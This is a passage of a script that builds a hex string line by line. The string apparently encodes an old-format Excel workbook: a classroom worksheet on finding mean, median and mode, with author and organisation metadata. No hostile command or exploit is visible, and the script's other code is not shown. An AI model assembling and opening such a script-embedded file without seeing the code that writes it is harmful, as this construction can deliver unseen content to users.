00007e020a001500"\r\nwD+="02000f0000005940fd000a00160000000f0019000000fd000a00160001000f000a0000007e0"\r\nwD+="20a00160002000f0000005440fd000a00170000000f001a000000fd000a00170001000f0009"\r\nwD+="0000007e020a00170002000f0000005940fd000a00180000000f001b000000fd000a0018000"\r\nwD+="1000f00090000007e020a00180002000f0000000000fd000a00190000000f001c000000fd00"\r\nwD+="0a00190001000f000a0000007e020a00190002000f0000000000fd000a001a0000000f001d0"\r\nwD+="00000fd000a001a0001000f000c0000007e020a001a0002000f0000005440fd000a001b0000"\r\nwD+="000f001d000000fd000a001b0001000f000c0000007e020a001b0002000f0000005440fd000"\r\nwD+="a001c0000000f001e000000fd000a001c0001000f00090000007e020a001c0002000f000000"\r\nwD+="5940fd000a001d0000000f001f000000fd000a001d0001000f000b0000007e020a001d00020"\r\nwD+="00f0000004440fd000a001e0000000f0020000000fd000a001e0001000f00090000007e020a"\r\nwD+="001e0002000f0000005940fd000a001f0000000f001e000000fd000a001f0001000f000a000"\r\nwD+="0007e020a001f0002000f0000805640d7004200ff070000580270002a002a002a002a002a00"\r\nwD+="2a0061002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a0"\r\nwD+="02a002a002a002a002a0008021000220000000300ff000000000000010f0008021000230000"\r\nwD+="000300ff000000000000010f0008021000260000000300ff000000000000010f00fd000a002"\r\nwD+="2000000210039000000fd000a00220001000f003a000000fd000a00220002000f002a000000"\r\nwD+="fd000a00230001000f003b0000007e020a00230002000f0000003440fd000a00260001000f0"\r\nwD+="046000000d7000a009000000028002a001c00c2010c00050008000400090303004600ec00aa"\r\nwD+="000f0002f0a2000000500008f00800000002000000011000000f0003f08a0000000f0004f02"\r\nwD+="8000000010009f0100000000000000000000000000000000000000002000af0080000000010"\r\nwD+="0000050000000f0004f052000000920c0af00800000001100000000a000043000bf01800000"\r\nwD+="07f0004010401bf0008000800ff0100000800bf0300000200000010f0120000000100010000"\r\nwD+="00010000000200000002000000000011f0000000005d0046001500120014000100012100000"\r\nwD+="0005c229201000000000c00140000000000000000000000010008000000100000001300ee1f"\r\nwD+="000008000800010300000a0014005700000000003e021200b60000000000400000000000000"\r\nwD+="0000000001d000f00032600010000000100260026000101ef0006000500370000000a000000"\r\nwD+="0908100000061000e228cd07c9c00000060200000b021400000000000000000020000000d67"\r\nwD+="30000d97900000d00020001000c00020064000f000200010011000200000010000800fca9f1"\r\nwD+="d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000000"\r\nwD+="0000000250204000000ff0081000200c1041400000015000000830002000000840002000000"\r\nwD+="4d006a0300004500700073006f006e0020005300740079006c0075007300200043004f004c0"\r\nwD+="04f005200200036003000300020004500530043002f005000200032000000000001040005dc"\r\nwD+="008c0243ef800701000100ea0a6f08640001000f006801020001006801020001004c0065007"\r\nwD+="400740065007200000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000010"\r\nwD+="000000000000002000000020000000100000030010000000000000000000000000000000000"\r\nwD+="0044494e55220000003402580053ab1e3f00000000000000000000000001000000000000000"\r\nwD+="000000000000000080000000100000001000000000002000000040000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000580000004f535045414182820200000000000000010000000000000000000000000000"\r\nwD+="0000000000010000000000000004000000000000000000000000000000000000006a0000000"\r\nwD+="000000003000000010000000f000000a1002200010064000100010001000200680168010000"\r\nwD+="00000000e03f000000000000e03f010055000200080000020e0000000000200000000000050"\r\nwD+="0000008021000000000000500ff000000000000010f0008021000010000000500ff00000000"\r\nwD+="0000010f0008021000020000000500ff000000000000010f0008021000030000000500ff000"\r\nwD+="000000000010f0008021000040000000500ff000000000000010f0008021000050000000500"\r\nwD+="ff000000000000010f0008021000060000000500ff000000000000010f00080210000700000"\r\nwD+="00500ff000000000000010f0008021000080000000500ff000000000000010f000802100009"\r\nwD+="0000000500ff000000000000010f00080210000a0000000500ff000000000000010f0008021"\r\nwD+="0000b0000000500ff000000000000010f00080210000c0000000500ff000000000000010f00"\r\nwD+="080210000d0000000500ff000000000000010f00080210000e0000000500ff0000000000000"\r\nwD+="10f00080210000f0000000500ff000000000000010f0008021000100000000200ff00000000"\r\nwD+="0000010f0008021000110000000200ff000000000000010f0008021000120000000200ff000"\r\nwD+="000000000010f0008021000130000000200ff000000000000010f0008021000140000000200"\r\nwD+="ff000000000000010f0008021000150000000200ff000000000000010f00080210001600000"\r\nwD+="00200ff000000000000010f0008021000170000000200ff000000000000010f000802100018"\r\nwD+="0000000200ff000000000000010f0008021000190000000200ff000000000000010f0008021"\r\nwD+="0001a0000000200ff000000000000010f00080210001b0000000200ff000000000000010f00"\r\nwD+="080210001c0000000200ff000000000000010f00080210001d0000000200ff0000000000000"\r\nwD+="10f00080210001e0000000200ff000000000000010f00080210001f0000000200ff00000000"\r\nwD+="0000010f00fd000a00000000000f002e000000fd000a00010000000f002d000000fd000a000"\r\nwD+="10001000f002c000000fd000a00010003000f0032000000bd001200020000000f000000f03f"\r\nwD+="0f00000049400100bd001200030000000f00000000400f00000045400100fd000a000300040"\r\nwD+="00f002f000000bd001200040000000f00000008400f00000000400100060023000400040017"\r\nwD+="004444444444844b4000002c0c37fd0d002502001f0001c001c042010500bd0012000500000"\r\nwD+="00f00000010400f0000002a400100bd001200060000000f00000014400f00000050400100bd"\r\nwD+="001200070000000f00000018400f00000052400100bd001200080000000f0000001c400f000"\r\nwD+="08056400100fd000a00080004000f0030000000bd001200090000000f00000020400f000000"\r\nwD+="5440010006002300090004000f0000000000000050400000040004ff0d002502001f0001c00"\r\nwD+="1c04201e300bd0012000a0000000f00000022400f00000044400100bd0012000b0000000f00"\r\nwD+="000024400f00008056400100bd0012000c0000000f00000026400f00000039400100bd00120"\r\nwD+="00d0000000f00000028400f00000041400100fd000a000d0004000f0031000000bd0012000e"\r\nwD+="0000000f0000002a400f0000c055400100060023000e0004000f00000000000000504000000"\r\nwD+="90004fe0d006502001f0001c001c042014a01bd0012000f0000000f0000002c400f00004050"\r\nwD+="400100bd001200100000000f0000002e400f00004053400100bd001200110000000f0000003"\r\nwD+="0400f00008053400100bd001200120000000f00000031400f00000049400100bd0012001300"\r\nwD+="00000f00000032400f00000000000100bd001200140000000f00000033400f0000005040010"\r\nwD+="0bd001200150000000f00000034400f00008047400100bd001200160000000f00000035400f"\r\nwD+="00000050400100bd001200170000000f00000036400f00000049400100bd001200180000000"\r\nwD+="f00000037400f00004050400100bd001200190000000f00000038400f00000042400100bd00"\r\nwD+="12001a0000000f00000039400f0000004c400100bd0012001b0000000f0000003a400f00000"\r\nwD+="050400100bd0012001c0000000f0000003b400f0000c050400100bd0012001d0000000f0000"\r\nwD+="003c400f00000037400100bd0012001e0000000f0000003d400f0000c052400100bd0012001"\r\nwD+="f0000000f0000003e400f00004054400100d7004400eb0500006c020e002a00160024003d00"\r\nwD+="16001600160024003d0016001600160024003d0016001600160016001600160016001600160"\r\nwD+="01600160016001600160016001600c2010c0009000e000600090404000000ec00c8000f0002"\r\nwD+="f036020000600008f00800000005000000051800000f0003f0060200000f0004f0280000000"\r\nwD+="10009f0100000000000000000000000000000000000000002000af008000000001800000500"\r\nwD+="00000f0004f078000000f2030af00800000005180000000a000093000bf0360000008000808"\r\nwD+="d36018500010000008b0002000000bf0008000a004701933900004801e0eeffff8101410000"\r\nwD+="08c001400000087f0300000c00000010f0120000000000020010020400b5000300600310009"\r\nwD+="700000011f0000000005d001a00150012001e0005001160808d360158259201000000000000"\r\nwD+="0000ec00080000000df000000000b6011200120200000000000000003f001000000000003c0"\r\nwD+="0400000496e73657274206120636f7079206f662074686520646174612066726f6d206c6561"\r\nwD+="737420746f20677265617465737420696e207468697320636f6c756d6e3c001000000000006"\r\nwD+="00111003f00000000000000ec006c000f0004f06c000000a20c0af00800000001180000000a"\r\nwD+="000073000bf02a0000008000d08d36018500010000008b0002000000bf0008000a0081010b0"\r\nwD+="00008bf0110001000c00140000008000010f0120000000000050020020300e200080000000d"\r\nwD+="00c400000011f0000000005d001a0015001200060001001160d08d360194269201000000000"\r\nwD+="0000000ec00080000000df000000000b601120012020000000000000000e500100000000000"\r\nwD+="3c00e60000416674657220796f752068617665207468652064657369726564206d65616e2c2"\r\nwD+="06d656469616e20616e64206d6f646520706c65617365206c69737420746865206e756d6265"\r\nwD+="727320696e206f7264657220746f2070726f766520746f206d6520796f75206861766520617"\r\nwD+="2726976656420617420746865207269676874206d656469616e2e20204920776f756c642061"\r\nwD+="6c736f206c696b6520796f7520746f2068696768746c6967687420746865206d6f646520627"\r\nwD+="920636f6c6f72696e6720696e207468652063656c6c73207468617420636f6e7461696e2074"\r\nwD+="6865206d6f64652e203c001000000000001b051100e500000000000000ec0066000f0004f06"\r\nwD+="600000022060af00800000003180000000a000063000bf0240000008000208e36018b000200"\r\nwD+="0000bf000800080081012e000008bf0110001000c00140000008000010f0120000000000020"\r\nwD+="0b0020f005a00080070021400b500000011f0000000005d001a00150012001e000300116020"\r\nwD+="8e3601782792010000000000000000ec00080000000df000000000b60112001202000000000"\r\nwD+="0000000a1001000000000003c00a20000506c6561736520656e746572206120746578742062"\r\nwD+="6f782068657265206578706c61696e2074686520737465707320696e766f6c76656420696e2"\r\nwD+="066696e64696e6720746865206d65616e2c206d656469616e20616e64206d6f64652e202053"\r\nwD+="6565206d7920646972656374696f6e73206f6e2066696e64696e6720746865206d65616e207"\r\nwD+="46f2068656c7020796f75207769746820746865206f74686572732e3c00100000000000a603"\r\nwD+="1100a100000000000000ec006c000f0004f06c000000720b0af00800000004180000000a000"\r\nwD+="073000bf02a0000008000708e36018500010000008b0002000000bf0008000a0081010d0000"\r\nwD+="08bf0110001000c00140000008000010f01200000000000200d00313002d000700b00321008"\r\nwD+="800000011f0000000005d001a00150012001e0004001160708e360154289201000000000000"\r\nwD+="0000ec00080000000df000000000b6011200120200000000000000005b001000000000003c0"\r\nwD+="05c0000426f6e757320517565732e0a57726974652074686520737465707320666f72207468"\r\nwD+="6520656173696573742077617920746f20617272616e67652074686520646174612066726f6"\r\nwD+="d206c6561737420746f2067726561746573742e3c00100000001000be010f005b0000000000"\r\nwD+="0000ec0018001f0005f010000000000017f00800000002000000051800003e021200b600000"\r\nwD+="000004000000000000000000000001d000f00031b000c00000001001b001b000c0cef000600"\r\nwD+="0500370000000a0000000908100000061000e228cd07c9c00000060200000b0214000000000"\r\nwD+="0030000000d000000da800000dc8200000d00020001000c00020064000f0002000100110002"\r\nwD+="00000010000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000"\r\nwD+="100800008000000000000000000250204000000ff0081000200c10414000000150000008300"\r\nwD+="02000000840002000000a10022000000ff000100010001000401000c0c0c000000000000e03"\r\nwD+="f000000000000e03f207455000200080000020e00030000000d00000000000b000000080210"\r\nwD+="00030000000b00ff000000000000010f0008021000040000000b00ff000000000000010f000"\r\nwD+="8021000050000000b00ff000000000000010f0008021000060000000b00ff00000000000001"\r\nwD+="0f0008021000070000000b00ff000000000000010f0008021000080000000b00ff000000000"\r\nwD+="000010f00080210000c0000000b00ff000000000000010f00fd000a00030000000f00510000"\r\nwD+="00fd000a00030002000f0057000000fd000a00030004000f002f000000fd000a00030005000"\r\nwD+="f0032000000fd000a00030006000f0031000000fd000a00030007000f005c000000fd000a00"\r\nwD+="030008000f005d000000fd000a00030009000f005e000000fd000a00040000000f005200000"\r\nwD+="0fd000a00040002000f0058000000fd000a00050000000f0053000000fd000a00050002000f"\r\nwD+="0059000000fd000a00060000000f0054000000fd000a00060002000f005a000000fd000a000"\r\nwD+="70000000f0055000000fd000a00070002000f005b000000fd000a00080000000f0056000000"\r\nwD+="fd000a000c0002000f0050000000fd000a000c0003000f005f000000fd000a000c0004000f0"\r\nwD+="060000000fd000a000c0005000f0061000000fd000a000c0006000f0062000000fd000a000c"\r\nwD+="0007000f0063000000fd000a000c0008000f0064000000fd000a000c000a000f0065000000d"\r\nwD+="7001200ea010000780070001c001c001c001c000e003e021200b60000000000400000000000"\r\nwD+="0000000000001d000f00030300020000000100030006000202ef0006000500370000000a000"\r\nwD+="0000908100000061000e228cd07c9c00000060200000b021400000000000500000007000000"\r\nwD+="e5830000cd8400000d00020001000c00020064000f000200010011000200000010000800fca"\r\nwD+="9f1d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000"\r\nwD+="0000000000250204000000ff0081000200c1041400000015000000830002000000840002000"\r\nwD+="000a10022000000ff00010001000100040000020202000000000000e03f000000000000e03f"\r\nwD+="207455000200080000020e00050000000700000002000900000008021000050002000900ff0"\r\nwD+="00000000000010f0008021000060002000900ff000000000000010f00fd000a00050002000f"\r\nwD+="003c000000fd000a00050003000f003d000000fd000a00050004000f002b000000fd000a000"\r\nwD+="50005000f003e000000fd000a00050006000f003d000000fd000a00050007000f003f000000"\r\nwD+="fd000a00050008000f0040000000fd000a00060002000f0041000000fd000a0006000300220"\r\nwD+="042000000fd000a00060004000f003d000000fd000a00060005000f0043000000fd000a0006"\r\nwD+="0006000f0044000000d7000800d0000000140062003e021200b600000000004000000000000"\r\nwD+="000000000001d000f00030c000500000001000c000c000505ef000600050037000000670817"\r\nwD+="00670800000000000000000000020001ffffffff004400000a0000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000000000000000000000000000000feff000005010200000000000000000000000000000"\r\nwD+="0000001000000e0859ff2f94f6810ab9108002b27b3d930000000a800000007000000010000"\r\nwD+="00400000000400000048000000080000006000000012000000700000000c000000880000000"\r\nwD+="d0000009400000013000000a000000002000000e40400001e000000100000004d6172696520"\r\nwD+="547265766973616e69001e0000000800000072696477616e00001e000000100000004d69637"\r\nwD+="26f736f667420457863656c004000000080c44fcb9448c601400000008036c20bc0cacb0103"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="0000000000000000000000000000000000000000000000000feff0000050102000000000000"\r\nwD+="00000000000000000000000100000002d5cdd59c2e1b10939708002b2cf9ae3000000028010"\r\nwD+="0000900000001000000500000000f0000005800000017000000880000000b00000090000000"\r\nwD+="100000009800000013000000a000000016000000a80000000d000000b00000000c000000050"\r\nwD+="1000002000000e40400001e0000002800000054686520477265617465722047686574746f20"\r\nwD+="466162756c6f757320466f756e646174696f6e000003000000d31a0a000b000000000000000"\r\nwD+="b000000000000000b000000000000000b000000000000001e1000000800000004000000616c"\r\nwD+="6c000300000063770003000000687700050000007175697a000500000074657374000500000"\r\nwD+="073746174000a000000646576696174696f6e000a000000617667206772617068000c100000"\r\nwD+="020000001e0000000b000000576f726b7368656574730003000000080000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000010000000"\r\nwD+="2000000030000000400000005000000060000000700000008000000090000000a0000000b00"\r\nwD+="00000c0000000d0000000e0000000f000000100000001100000012000000130000001400000"\r\nwD+="015000000160000001700000018000000190000001a0000001b0000001c0000001d0000001e"\r\nwD+="0000001f0000002000000021000000220000002300000024000000250000002600000027000"\r\nwD+="00028000000290000002a0000002b0000002c0000002d0000002e0000002f00000030000000"\r\nwD+="3100000032000000330000003400000035000000360000003700000038000